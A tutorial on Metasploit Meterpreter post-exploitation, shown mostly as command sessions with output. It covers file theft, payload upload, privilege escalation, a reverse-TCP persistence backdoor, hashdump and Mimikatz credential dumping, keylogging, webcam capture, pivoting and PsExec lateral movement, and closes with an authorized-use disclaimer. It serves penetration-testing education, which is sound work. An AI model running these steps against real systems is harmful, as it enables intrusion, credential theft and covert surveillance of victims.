Metasploit Meterpreter Post-Exploitation Techniques

What is Meterpreter?

Meterpreter (Meta-Interpreter) is one of the most powerful payloads in the Metasploit Framework. It is an advanced, dynamically extensible payload that runs through in-memory DLL injection and provides a rich set of post-exploitation features.

Key features of Meterpreter

  • Memory-resident: runs entirely in memory and leaves no files on disk
  • Encrypted communication: talks to the attacker over a TLS-encrypted channel
  • Dynamic loading: extension modules can be loaded at runtime
  • Cross-platform: supports Windows, Linux, macOS and other operating systems

Basic Meterpreter commands

Once a Meterpreter session has been obtained, the following basic commands can be used to operate it.

Viewing the help information

meterpreter > help

Core Commands
=============
    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    exit          Terminate the Meterpreter session
    help          Help menu
    migrate       Migrate the server to another process
    ...

Getting system information

meterpreter > sysinfo
Computer        : TARGET-PC
OS              : Windows 10 (10.0 Build 19041)
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

Getting the current user identity

meterpreter > getuid
Server username: TARGET-PC\Administrator

File system operations

# Show the current directory
meterpreter > pwd
C:\Users\Administrator\Desktop

# List files
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
========================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2023-12-01 10:30:15 +0800  desktop.ini
100666/rw-rw-rw-  1024  fil   2023-12-15 14:22:33 +0800  important.txt

# Change directory
meterpreter > cd C:\\Windows\\System32

# Download a file to the attacking machine
meterpreter > download C:\\Users\\Administrator\\Desktop\\important.txt /tmp/
[*] Downloading: C:\Users\Administrator\Desktop\important.txt -> /tmp/important.txt
[*] Downloaded 1.00 KiB of 1.00 KiB (100.0%): important.txt

# Upload a file to the target machine
meterpreter > upload /tmp/payload.exe C:\\Windows\\Temp\\
[*] uploading  : /tmp/payload.exe -> C:\Windows\Temp\payload.exe
[*] uploaded   : /tmp/payload.exe -> C:\Windows\Temp\payload.exe

System information gathering

Collecting detailed information about the target system is essential for the later stages of the engagement.

# Get the process list
meterpreter > ps
PID   PPID  Name               Arch  Session  User                  Path
---   ----  ----               ----  -------  ----                  ----
0     0     [System Process]
4     0     System             x64   0
88    4     Registry           x64   0
...

# Get the network configuration
meterpreter > ipconfig
Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 11
============
Name         : Intel(R) Ethernet Connection
Hardware MAC : 00:0c:29:aa:bb:cc
MTU          : 1500
IPv4 Address : 192.168.1.100
IPv4 Netmask : 255.255.255.0

# View the routing table
meterpreter > route
IPv4 network routes
====================
    Subnet           Netmask          Gateway         Metric  Interface
    ------           -------          -------         ------  ---------
    0.0.0.0          0.0.0.0          192.168.1.1     25      11
    192.168.1.0      255.255.255.0    192.168.1.100   281     11

Privilege escalation techniques

Escalating privileges with getsystem

meterpreter > getuid
Server username: TARGET-PC\user

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Using the Local Exploit Suggester

When getsystem fails, the local exploit suggester module can be used instead.

meterpreter > background
[*] Backgrounding session 1...

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.100 - Collecting local exploits for x64/windows...
[*] 192.168.1.100 - 37 exploit checks are being tried...
[+] 192.168.1.100 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.1.100 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.

Setting up a persistent backdoor

Using the persistence module

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor

OPTIONS:
    -A        Automatically start a matching exploit/multi/handler
    -L <opt>  Location in target host to write payload
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp
    -S        Automatically start the agent on boot as a service
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

# Create a backdoor that starts automatically at boot
meterpreter > run persistence -X -i 10 -p 4444 -r 192.168.1.50
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/TARGET-PC_20231220.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444
[*] Persistent agent script is 99643 bytes long
[+] Persistent Script written to C:\Windows\TEMP\vBsMKQ.vbs
[*] Executing script C:\Windows\TEMP\vBsMKQ.vbs
[+] Agent executed with PID 2756
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YqGNWCfkhv
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YqGNWCfkhv

Credential harvesting

Using hashdump to obtain password hashes

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user:1001:aad3b435b51404eeaad3b435b51404ee:e52cac67419a9a224a3b108f3fa6cb6d:::

Using the Mimikatz extension (Kiwi)

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20210810 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi`
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

Success.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials

msv credentials
===============
Username       Domain      NTLM                              SHA1
--------       ------      ----                              ----
Administrator  TARGET-PC   31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709

wdigest credentials
===================
Username       Domain      Password
--------       ------      --------
Administrator  TARGET-PC   P@ssw0rd123!

Network reconnaissance and pivoting

Setting up routes for internal network penetration

# View the target's network interfaces
meterpreter > ipconfig
Interface 11
============
IPv4 Address : 192.168.1.100
IPv4 Netmask : 255.255.255.0

Interface 15
============
IPv4 Address : 10.10.10.5
IPv4 Netmask : 255.255.255.0

# Add a route to the internal network
meterpreter > run autoroute -s 10.10.10.0/24
[*] Adding a route to 10.10.10.0/255.255.255.0...
[+] Added route to 10.10.10.0/255.255.255.0 via 192.168.1.100
[*] Use the -p option to list all active routes

# View the configured routes
meterpreter > run autoroute -p
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.10.0         255.255.255.0      Session 1

Using port forwarding

# Set up a local port forward
meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.20
[*] Local TCP relay created: :3389 <-> 10.10.10.20:3389

# The internal host's RDP service can now be reached directly from the attacking machine
# rdesktop 127.0.0.1:3389

Commonly used post-exploitation modules

Information gathering modules

# Enumerate installed applications
msf6 > use post/windows/gather/enum_applications
msf6 post(windows/gather/enum_applications) > set SESSION 1
msf6 post(windows/gather/enum_applications) > run

# Enumerate browser credentials
msf6 > use post/multi/gather/firefox_creds
msf6 > use post/windows/gather/enum_chrome

# Take a screenshot
meterpreter > screenshot
Screenshot saved to: /root/oBFDNQUf.jpeg

# Keystroke logging
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
user@email.com<Tab>MySecretPassword<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

# Enable the webcam
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/webcam.jpeg

Lateral movement

# Lateral movement with PsExec
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.20
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass P@ssw0rd123!
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > exploit

[*] Started bind TCP handler against 10.10.10.20:4444
[*] Connecting to the server...
[*] Meterpreter session 2 opened

Security notes

  • This article is for educational purposes and authorized penetration testing only
  • Penetration testing of systems without authorization is illegal
  • Always obtain written authorization before performing a penetration test
  • After testing is complete, remove all traces and backdoors left behind
